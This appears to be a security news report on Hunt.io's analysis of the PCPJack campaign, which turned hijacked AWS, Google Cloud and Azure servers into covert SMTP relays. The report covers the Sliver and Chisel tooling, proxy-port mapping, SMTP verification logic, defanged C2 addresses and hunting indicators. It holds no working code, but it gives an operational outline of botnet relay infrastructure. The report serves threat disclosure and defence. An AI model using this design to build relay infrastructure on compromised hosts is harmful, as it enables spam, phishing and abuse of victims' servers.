"Compromised business servers across the U.S., Europe, and Asia were quietly converted into SMTP proxies, verified for mail relay capability, and synced to a downstream consumer every five minutes," Hunt.io said in a statement.
Hunt.io outlines the intrusion and what was recovered
Security firm Hunt.io reported that the threat actor known as PCPJack had hijacked cloud servers in Amazon Web Services, Google Cloud, and Microsoft Azure and repurposed them as covert SMTP relays. Investigators who accessed two unauthenticated open directories on a command-and-control (C2) host at 213.136.80[.]73 found source code, compiled binaries, deployment logs, internet scanners, exploitation tooling and a live Sliver configuration. Hunt.io said the infrastructure was still running when they discovered it.
Tools and implants: Sliver, Chisel, and hidden binaries
The recoveries included a Sliver-integrated SMTP proxy deployment toolkit and Chisel tunneling and proxy binaries built for common Linux CPU architectures (AMD64, ARM64, x86). On victim hosts the payload is dropped as a hidden, dot-prefixed file persisted at /var/tmp/.xs. Deployer scripts were found that load the Sliver C2 client configuration and filter for Linux beacons that had checked in within the prior ten minutes; those beacons are implants that periodically phone home to the C2 server to retrieve commands.
SMTP gating, proxy mapping, and verification logic
Hunt.io described operational logic that makes clear the operation’s purpose: an SMTP quality gate probes for outbound access to smtp.gmail[.]com:587 and hosts that fail the check are skipped with an exit code of zero. Each beacon is assigned a deterministic SOCKS5 proxy port derived from an MD5 hash of its Sliver UUID and mapped into the range 10000–14999, ensuring the same beacon maps to the same port across runs without a shared registry. A separate Python daemon named chisel_verifier.py runs persistently on the C2, enumerating Chisel tunnel ports every 60 seconds (via ss -tlnp), testing each new port for SMTP capability, and removing failed tunnels from the active pool.
Scale, cadence, and data flows
Hunt.io observed a 230-node outcome in the recovered files. Verified proxies are enriched with exit IP address, country and ASN using services like api.ipify[.]org and ip-api[.]com and the resulting proxy lists are synced via SCP every five minutes to a downstream server at 38.242.204[.]245, which was not accessible at the time of reporting. Initial deployer scripts processed beacons in batches of 50 with timing pauses—25 minutes after uploads and 15 minutes after execution—to accommodate slow beacon check-ins; subsequent script iterations removed the SMTP gate and batching logic. A diagnostic script was also present that checks for Chisel binaries at known drop paths, running Chisel processes, disk space, reachability of port 9000 on the C2, and the presence of persistence artifacts such as cron entries or systemd services.
What this means for technologists, affected enterprises, and adversaries
- Technologists and security teams: Hunt.io’s findings point to specific indicators to hunt for—hidden dot-prefixed binaries at /var/tmp/.xs, Chisel and Sliver artifacts, unusually-assigned SOCKS5 ports in the 10000–14999 range, and persistent chisel_verifier.py processes on any exposed management hosts. The SCP sync cadence and enrichment calls to api.ipify[.]org and ip-api[.]com create observable network patterns.
- Affected enterprises and procurement leaders: Servers in AWS, Google Cloud, and Azure were co-opted as SMTP proxies. Organizations should inspect cloud workloads for unexpected hidden processes, cron/systemd persistence entries, and the presence of exploitation tooling or internet scanners in file systems and logs.
- Adversaries and threat actors: The recovered files show an operational pipeline that deterministically maps beacons to proxy ports, verifies SMTP capability, and maintains an updated list consumed every five minutes—an infrastructure expressly built to deliver outbound mail at scale, regardless of the downstream consumer’s intent.
SentinelOne first identified PCPJack in April 2026 after observing a credential-theft framework that targets cloud services and that took steps to terminate and remove processes or artifacts associated with TeamPCP. Hunt.io characterized the campaign as opportunistic and noted it could not determine from the recovered files whether the progression reflected a single operator iterating or multiple actors sharing infrastructure. The immediate end goal remains unclear: the verified proxy list was being consumed, and whether for spam, phishing, or other uses the infrastructure to deliver at scale was clearly running.
